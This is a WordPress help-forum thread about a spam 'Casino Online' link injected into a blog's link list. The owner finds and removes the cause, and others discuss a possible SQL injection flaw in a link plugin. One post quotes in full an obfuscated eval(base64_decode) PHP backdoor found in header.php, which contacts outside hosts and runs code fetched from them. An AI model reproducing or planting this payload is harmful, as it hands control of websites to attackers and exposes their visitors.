Forums

"Casino Online" (6 posts)

  1. Canuckscorner.com
    Member
    Posted 11 months ago #

    This morning I head to my blog and at the top of my links under Blogroll, I notice that a link to "Casino Online" has been added. In my admin panel it is under the categroy Blogroll, but I cannot delete it.

    This is obviously a security breach? My version is up to date. I do use the My link Order plug in.

    Does anyone have any information on this or suggestions?

  2. Canuckscorner.com
    Member
    Posted 11 months ago #

  3. mrmist
    Member
    Posted 11 months ago #

    I have had a quick look at the My Link Order plugin and I think that it could be vunerable to SQL injection attacks, as there are a few update statements that are produced based on unsantized GET values.

    If you have access to your web logs you chould check through for anything that looks dodgy.

  4. Canuckscorner.com
    Member
    Posted 11 months ago #

    <?php eval(base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

    I found this code in my header.php file...removed it and the link is gone.

    I am not a programmer or any type of expert on this stuff. Do you recommend I remove the My link Order plugin?

    Thanks for the reply!

  5. mrmist
    Member
    Posted 11 months ago #

    I can't really say for definite. The attackers must have got in to your blog somehow but without trawling through logs it will be difficult to discover where.

  6. raisingsac
    Member
    Posted 10 months ago #

    I was having the exact same problem. I found the same chunk of code in my header.php file that Canuckscorner.com did. I removed it, removed the link and it finally disappeared! The only other thing you should do is open up your FTP, go into Public HTML, right click on wp-content, select change permissions and enter 755 ... that should help with unwanted changes to your code.

Reply

You must log in to post.

About this Topic